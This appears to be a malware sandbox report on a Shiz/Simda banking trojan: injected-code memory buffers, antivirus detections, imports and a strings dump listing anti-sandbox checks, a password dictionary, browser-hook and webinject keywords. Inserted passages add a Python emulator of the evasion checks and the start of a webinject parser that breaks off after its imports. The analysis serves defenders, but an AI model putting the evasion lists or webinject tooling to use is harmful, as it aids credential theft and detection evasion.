PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545396.719125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02e34000
process_identifier: 348
buffer: ×1œ2ñ253s3ö3”5
success 1 0
1727545397.000125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02d90000
process_identifier: 1736
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
success 1 0
1727545397.000125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02d91000
process_identifier: 1736
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545397.016125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02de4000
process_identifier: 1736
buffer: ×1œ2ñ253s3ö3”5
success 1 0
1727545397.266125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x03a30000
process_identifier: 1684
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
success 1 0
1727545397.266125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x03a31000
process_identifier: 1684
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545397.281125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x03a84000
process_identifier: 1684
buffer: ×1œ2ñ253s3ö3”5
success 1 0
Attempts to create or modify a system certificate (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
Network activity contains more than one unique user agent (3 events)
process svchost.exe useragent Internal
process svchost.exe useragent Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
process ComputerZService.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Expresses interest in specific running processes (2 events)
process: potential process injection target svchost.exe
process system
Detects VirtualBox through the presence of a registry key (1 event)
registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
Detects a virtual machine through custom firmware (2 events)
Time & API Arguments Status Return Repeated
1727545401.3905
NtQuerySystemInformation
information_class: 76 (SystemFirmwareTableInformation)
failed 3221225507 0
1727545401.3905
NtQuerySystemInformation
information_class: 76 (SystemFirmwareTableInformation)
success 0 0
Generates some ICMP traffic
The file has been identified as malicious by 66 antivirus engines on VirusTotal (50 out of 66 events)
ALYac Gen:Variant.Ulise.39843
APEX Malicious
AVG Win32:Shiz-JT [Trj]
Acronis suspicious
Ad-Aware Gen:Variant.Ulise.39843
AhnLab-V3 Trojan/Win32.Gen.C1571325
Alibaba Backdoor:Win32/Simda.650fe7e4
Antiy-AVL Trojan/Win32.Unknown
Arcabit Trojan.Ulise.D9BA3
Avast Win32:Shiz-JT [Trj]
Avira TR/Hijacker.Gen
Baidu Win32.Trojan-Spy.Shiz.b
BitDefender Gen:Variant.Ulise.39843
BitDefenderTheta AI:Packer.A4C1F93F1E
Bkav W32.AIDetectVM.malware
CAT-QuickHeal Trojan.Beaugrit.S16628
ClamAV Win.Trojan.Generic-6323528-0
Comodo TrojWare.Win32.Spy.Shiz.ZV@6ldvxf
CrowdStrike win/malicious_confidence_100% (W)
Cybereason malicious.315444
Cylance Unsafe
Cyren W32/Shiz.R.gen!Eldorado
DrWeb Trojan.PWS.Ibank.323
ESET-NOD32 a variant of Win32/Spy.Shiz.NBX
Emsisoft Gen:Variant.Ulise.39843 (B)
Endgame malicious (high confidence)
F-Prot W32/Shiz.R.gen!Eldorado
F-Secure Trojan.TR/Hijacker.Gen
FireEye Generic.mg.53efb5b3154447e4
Fortinet W32/Shiz.NBX!tr
GData Gen:Variant.Ulise.39843
Ikarus Backdoor.Win32.Simda
Invincea heuristic
Jiangmin Backdoor.Generic.axsv
K7AntiVirus Spyware ( 004cadd91 )
K7GW Spyware ( 004cadd91 )
Kaspersky HEUR:Backdoor.Win32.Generic
Lionic Trojan.Win32.Generic.m!e
MAX malware (ai score=85)
Malwarebytes Trojan.Banker
MaxSecure Trojan.Malware.300983.susgen
McAfee BackDoor-FDOB!53EFB5B31544
McAfee-GW-Edition BehavesLike.Win32.Backdoor.bh
MicroWorld-eScan Gen:Variant.Ulise.39843
Microsoft Backdoor:Win32/Simda.gen!B
NANO-Antivirus Trojan.Win32.Ibank.esrglb
Paloalto generic.ml
Panda Trj/Genetic.gen
Qihoo-360 Win32/Trojan.Carberp.B
Rising Backdoor.Generic!8.CE (TFE:dGZlOgPVgBt2iNDDHA)
Connects to IP addresses that no longer respond to requests (legitimate services usually remain up and running) (18 events)
Visual analysis
Binary image
[image placeholders: data-import images at 288x288, 224x224, 192x192, 160x160, 128x128, 96x96, 64x64 and 32x32]
Run screenshots
No run screenshots: none were generated while this sample ran.

PE Compile Time

2011-08-02 17:26:00

PE Imphash

173abfa8f7d7adac2a90a2e42625b7d9

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00002b14 0x00002c00 6.115647371012377
.rdata 0x00004000 0x00001bf8 0x00001c00 6.098143094424814
.data 0x00006000 0x0005711c 0x00053800 6.759145336421315
.reloc 0x0005e000 0x0000099c 0x00000a00 6.07318440201103

Imports

Library MSVCRT.dll:
0x40412c wcsstr
0x404130 _snwprintf
0x404134 strstr
0x404138 _snprintf
0x40413c _except_handler3
0x404140 memset
0x404144 memcpy
Library SHELL32.dll:
0x404160 None
0x404164 SHGetFolderPathA
Library SHLWAPI.dll:
0x40416c PathAddBackslashA
0x404170 StrStrIA
0x404174 PathFileExistsA
0x404178 PathAppendA
Library ntdll.dll:
0x404190 RtlAdjustPrivilege
0x404194 RtlImageNtHeader
0x404198 RtlCreateUserThread
Library KERNEL32.dll:
0x40402c GetModuleFileNameW
0x404034 MoveFileA
0x404038 DeviceIoControl
0x40403c ExitProcess
0x404040 GlobalAddAtomA
0x404044 GlobalFindAtomA
0x404048 CopyFileA
0x40404c GetCurrentProcessId
0x404054 CreateFileW
0x404058 GetVersionExA
0x40405c FreeLibrary
0x404060 IsDebuggerPresent
0x404064 GetTickCount
0x404070 GetModuleFileNameA
0x404074 CreateFileA
0x404078 SetFilePointer
0x40407c MoveFileExA
0x404080 lstrcpynA
0x404084 SetEndOfFile
0x404088 UnlockFile
0x40408c LockFile
0x404090 SetFileTime
0x404094 WriteFile
0x404098 IsBadWritePtr
0x40409c ReadFile
0x4040a0 GetFileSizeEx
0x4040a4 GetLastError
0x4040a8 SetFileAttributesA
0x4040ac GetTempFileNameA
0x4040b0 GetFileTime
0x4040b4 GetTempPathA
0x4040b8 DeleteFileA
0x4040bc GetProcAddress
0x4040c0 GetModuleHandleA
0x4040c4 HeapAlloc
0x4040c8 HeapFree
0x4040cc GetProcessHeap
0x4040d0 HeapValidate
0x4040d4 GetCurrentProcess
0x4040d8 Sleep
0x4040e0 VirtualAlloc
0x4040e4 VirtualQuery
0x4040e8 Process32First
0x4040ec VirtualFree
0x4040f0 CreateRemoteThread
0x4040f4 OpenProcess
0x4040f8 CreateProcessA
0x4040fc Module32First
0x404104 VirtualAllocEx
0x404108 LoadLibraryA
0x40410c Process32Next
0x404114 Module32Next
0x404118 CloseHandle
0x40411c WriteProcessMemory
0x404120 SwitchToThread
Library USER32.dll:
0x404180 FindWindowA
0x404184 CharUpperA
0x404188 PostMessageA
Library ADVAPI32.dll:
0x404000 RegCreateKeyExA
0x404004 RegSetValueExA
0x404008 RegQueryValueExA
0x40400c RegOpenKeyExA
0x404010 RegFlushKey
0x404014 RegCloseKey
0x404018 OpenProcessToken
0x40401c GetTokenInformation
0x404020 GetUserNameA
Library ole32.dll:
0x4041a0 CoUninitialize
0x4041a4 CoCreateInstance
0x4041ac CoInitializeEx
Library OLEAUT32.dll:
0x40414c SysFreeString
0x404150 SysAllocString
0x404154 VariantClear
0x404158 VariantInit

\NOLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
SystemDrive
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
\\?\globalroot\systemroot\system32\drivers\ntfs.sys
ntdll.dll
RtlUniform
kernel32.dll
IsWow64Process
kernel
server
idontknow
administrator
666666
12345678
soccer
abc123
password1
football1
fuckyou
monkey
iloveyou1
superman1
slipknot1
jordan23
princess1
liverpool1
monkey1
baseball1
123abc
qwerty1
blink182
myspace1
user111
098765
qweryuiopas
qwerty
111111
password
123456
Windows Defender
MpClient.dll
WDEnable
\\.\KmxAgent
____AVP.Root
\\.\pipe\acsipc_server
\AVG\AVG9\dfncfg.dat
\AVG\AVG9\dfmcfg.dat
\PrevxCSI\csidb.csi
BL09n@:
j`4bOND
PTue Aug 2 12:53:17 20112
winlogon.exe
explorer.exe
\apppatch\
svchost.exe
Tue Aug 2 12:53:17 20111
user32.dll
HARDWARE\DESCRIPTION\System
SystemBiosVersion
test_item.exe
SANDBOX
MALNETVM
VIRUSCLONE
test user
\sand-box\
\cwsandbox\
\sandbox\
_snprintf
strstr
_snwprintf
wcsstr
MSVCRT.dll
SHGetFolderPathA
SHELL32.dll
PathFileExistsA
StrStrIA
PathAddBackslashA
PathAppendA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
RtlAdjustPrivilege
ntdll.dll
IsDebuggerPresent
GetTickCount
GetVolumeInformationA
GetEnvironmentVariableA
GetModuleFileNameA
CreateFileA
SetFilePointer
MoveFileExA
lstrcpynA
SetEndOfFile
UnlockFile
LockFile
SetFileTime
WriteFile
IsBadWritePtr
ReadFile
GetFileSizeEx
GetLastError
SetFileAttributesA
GetTempFileNameA
GetFileTime
GetTempPathA
DeleteFileA
GetProcAddress
GetModuleHandleA
HeapAlloc
HeapFree
GetProcessHeap
HeapValidate
GetCurrentProcess
FlushInstructionCache
VirtualAlloc
VirtualQuery
Process32First
VirtualFree
CreateRemoteThread
OpenProcess
CreateProcessA
Module32First
GetHandleInformation
VirtualAllocEx
LoadLibraryA
Process32Next
CreateToolhelp32Snapshot
Module32Next
CloseHandle
WriteProcessMemory
SwitchToThread
GetSystemWindowsDirectoryA
FreeLibrary
GetSystemTimeAsFileTime
GetModuleFileNameW
SetCurrentDirectoryA
MoveFileA
DeviceIoControl
ExitProcess
GlobalAddAtomA
GlobalFindAtomA
CopyFileA
GetCurrentProcessId
InterlockedDecrement
CreateFileW
GetVersionExA
KERNEL32.dll
FindWindowA
CharUpperA
PostMessageA
USER32.dll
RegSetValueExA
RegQueryValueExA
RegCreateKeyExA
RegOpenKeyExA
RegFlushKey
RegCloseKey
OpenProcessToken
GetTokenInformation
GetUserNameA
ADVAPI32.dll
CoCreateInstance
CoUninitialize
CoInitializeEx
CoInitializeSecurity
ole32.dll
OLEAUT32.dll
_except_handler3
memset
memcpy
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
L!This program cannot be run in DOS mode.
`.data
.reloc
L!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
[code-section bytes of the embedded module, not strings; the only readable fragments in this run are the immediates "GET", "POST", "http" and "ADVA", plus ".ini"]
name.key
\secrets.key
sign.key
kernel32.dll
CreateFileW
\explorer.exe
GetFileAttributesW
user32.dll
GetWindowTextA
OLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
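The hostnames, user name, paths, tool process names, window title and driver path listed above are the environment checks this sample's imports (GetComputerNameA/W, GetUserNameA, GetModuleFileNameA, Process32First/Next, GetWindowTextA, GetFileAttributesW, IsDebuggerPresent) are wired to. The Python below is an added example, not code from the sample or from the analysis platform: it emulates those checks against a host profile so a sandbox operator can see which of their own artefacts would trip them. The indicator lists are the ones in the dump; the HostProfile shape, the case-insensitive matching (StrStrIA and CharUpperA are imported, so this is a guess) and both sample hosts are assumptions. The SystemBiosVersion read is not modelled because the value it is compared with does not appear in the strings.

```python
"""Emulation of the host checks the strings above imply, as a harness for
hardening a sandbox. Added example; only the indicator lists come from this
report, everything else (profile shape, match rules, sample hosts) is assumed."""
from dataclasses import dataclass, field
from typing import List, Set

# Indicator lists copied from the strings dump.
HOSTNAME_MARKERS = ("SANDBOX", "MALNETVM", "VIRUSCLONE")
USERNAME_MARKERS = ("test user",)
PATH_MARKERS = ("\\sand-box\\", "\\cwsandbox\\", "\\sandbox\\")
BINARY_MARKERS = ("test_item.exe",)
TOOL_PROCESSES = ("wireshark.exe", "dumpcap.exe", "idag.exe", "vmwaretray.exe")
WINDOW_TITLE_MARKERS = ("OLLYDBG",)
VMWARE_DRIVER = "\\\\?\\globalroot\\systemroot\\system32\\vmx_fb.dll"


@dataclass
class HostProfile:
    """What the relevant Win32 calls would return on the host under test (assumed shape)."""
    computer_name: str                                      # GetComputerNameA/W
    user_name: str                                          # GetUserNameA
    module_path: str                                        # GetModuleFileNameA of the sample
    processes: List[str] = field(default_factory=list)      # Process32First/Next
    window_titles: List[str] = field(default_factory=list)  # GetWindowTextA
    existing_files: Set[str] = field(default_factory=set)   # GetFileAttributesW
    debugger_present: bool = False                          # IsDebuggerPresent


def _contains(haystack: str, needle: str) -> bool:
    # Modelled as case-insensitive substring search (assumption based on the
    # StrStrIA / CharUpperA imports).
    return needle.lower() in haystack.lower()


def tripped_indicators(host: HostProfile) -> List[str]:
    """Return every indicator the host would trip, one string per hit."""
    hits: List[str] = []
    if host.debugger_present:
        hits.append("IsDebuggerPresent")
    hits += [f"computer name contains {m}" for m in HOSTNAME_MARKERS
             if _contains(host.computer_name, m)]
    hits += [f"user name contains {m!r}" for m in USERNAME_MARKERS
             if _contains(host.user_name, m)]
    hits += [f"module path contains {m}" for m in PATH_MARKERS
             if _contains(host.module_path, m)]
    basename = host.module_path.rsplit("\\", 1)[-1]
    hits += [f"module name is {m}" for m in BINARY_MARKERS
             if basename.lower() == m]
    hits += [f"process {p} running" for p in TOOL_PROCESSES
             if any(_contains(run, p) for run in host.processes)]
    hits += [f"window title contains {m}" for m in WINDOW_TITLE_MARKERS
             if any(_contains(t, m) for t in host.window_titles)]
    if any(f.lower() == VMWARE_DRIVER.lower() for f in host.existing_files):
        hits.append("vmx_fb.dll present (VMware guest)")
    return hits


def sample_sandbox() -> HostProfile:
    """Constructed host: hostname renamed, but the submission directory and the
    VMware tray helper still give it away."""
    return HostProfile(
        computer_name="DESKTOP-7Q2K",
        user_name="analyst",
        module_path="C:\\cwsandbox\\run\\test_item.exe",
        processes=["explorer.exe", "vmwaretray.exe"],
        window_titles=["Untitled - Notepad"],
    )


def sample_clean() -> HostProfile:
    """Constructed host with none of the markers."""
    return HostProfile("FINANCE-LT-0412", "m.keller",
                       "C:\\Users\\m.keller\\Downloads\\invoice.exe",
                       processes=["explorer.exe", "outlook.exe"],
                       window_titles=["Inbox - Outlook"])


if __name__ == "__main__":
    for hit in tripped_indicators(sample_sandbox()):
        print("trips:", hit)
```

Run it against your own sandbox's values; every hit is an artefact worth renaming before the sample gets a chance to look at it.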
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
SystemDrive
Software\Microsoft\Windows NT\CurrentVersion
InstallDate
SYSTEM
%s!%s!%08X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
software\microsoft
Global\
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
%dd %dh %dm
CLOSED
LISTEN
SYN_SENT
SYN_RCVD
FIN_WAIT1
FIN_WAIT2
CLOSE_WAIT
CLOSING
LAST_ACK
TIME_WAIT
DELETE_TCB
netstat
{Proto
Local address
Remote address
taskmgr
Process name
[System Process]
netuser
Software\Microsoft\Internet Explorer\TypedURLs
IE history:
DAN NLD NLB ENU ENG ENA ENC ENZ ENI FIN FRA FRB FRC FRS DEU DES DEA ISL ITA ITS NOR NON PTB PTG SVE ESP ESM ESN TRK PLK CSY SKY HUN RUS GRE ALL
{BotVer:
{Process:
{Username:
PROCESSOR_IDENTIFIER
{Processor:
{Language:
%dx%d@%d
{Screen:
dd:MMM:yyyy
{Date:
HH:mm:ss
{Local time:
%c%d:%02d
{GMT:
{Uptime:
{Windows directory:
{Administrator:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
kaspersky
eset.com
antivir
virustotal
virusinfo
z-oleg.com
kltest.org.ru
trendsecure
anti-malware
.comodo.com
google.com
Dnsapi.dll
DnsQuery_A
DnsQuery_UTF8
DnsQuery_W
Query_Main
ws2_32.dll
getaddrinfo
gethostbyname
inet_addr
qwrtpsdfghjklzxcvbnm
eyuioa
1676d5775e05c50b46baa5579d4fc7
!verif
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
6d3ad29879a90b4dd1b4f76e82166ca3
data.txt
ntdll.dll
ZwQuerySystemInformation
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_%08x
explorer.exe
Shell_TrayWnd
00000000000888888888@@@@@@@@HHHHHHHHPPPPPPXXXXXXXXXXXX`````hhhhhhhhhhpppppppppxxxxxxxxxx
000000000000000000000000@@@@@@@@@@@@@@@@PPPPPPPPPPPPPXXXXXXXXXXXhhhhhhhhhhhpppppppppxxxxxxxxxxxx
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
taskmgr
default
DefWindowProcW
DefWindowProcA
DefDlgProcW
DefDlgProcA
DefFrameProcW
DefFrameProcA
DefMDIChildProcW
DefMDIChildProcA
CallWindowProcW
CallWindowProcA
RegisterClassW
RegisterClassA
RegisterClassExA
RegisterClassExW
PeekMessageW
PeekMessageA
OpenInputDesktop
OpenDesktopA
OpenDesktopW
SwitchDesktop
MessageBeep
FlashWindowEx
GetCursorPos
SetCursorPos
GetMessagePos
SetCapture
ReleaseCapture
GetCapture
Winmm.dll
PlaySoundW
PlaySoundA
sndPlaySoundW
sndPlaySoundA
Kernel32.dll
Gdi32.dll
SetDIBitsToDevice
SetThreadDesktop
static
Content-Length
http://
NSS layer
https://
Referer
Content-Type
HTTP/1.
Transfer-Encoding
chunked
Connection
Proxy-Connection
identity
Accept-Encoding
If-Modified-Since
nspr4.dll
PR_Write
PR_Read
PR_Close
PR_OpenTCPSocket
PR_GetError
PR_SetError
PR_GetNameForIdentity
UserAgent
[[[URL: %s
Process: %s
User-agent: %s]]]
Accept-Encoding:
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
InternetQueryDataAvailable
InternetReadFile
InternetReadFileExA
InternetReadFileExW
InternetCloseHandle
set_url
data_before
data_end
data_inject
data_after
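set_url, data_before, data_end, data_inject and data_after are the keywords of the ZeuS-family webinject format, which the nspr4 (PR_Read/PR_Write) and Wininet hooks listed nearby apply to pages as the browser receives them. The Python below is an added example and not the sample's own parser: it reads a config in that grammar and rewrites a page the way the hooked browser would see it. The details of the grammar (one set_url line with a wildcard mask and trailing flag letters, each data_* block closed by data_end, the text between data_before and data_after replaced by data_inject), the substring matching, and the sample config and page are assumptions taken from the public format, not recovered from this binary.

```python
"""Parser and applier for the webinject grammar the set_url/data_before/
data_inject/data_after/data_end keywords belong to (the ZeuS-family format).
Added example; grammar details, URL-mask semantics and the sample config and
page below are assumptions, not recovered from this binary."""
import fnmatch
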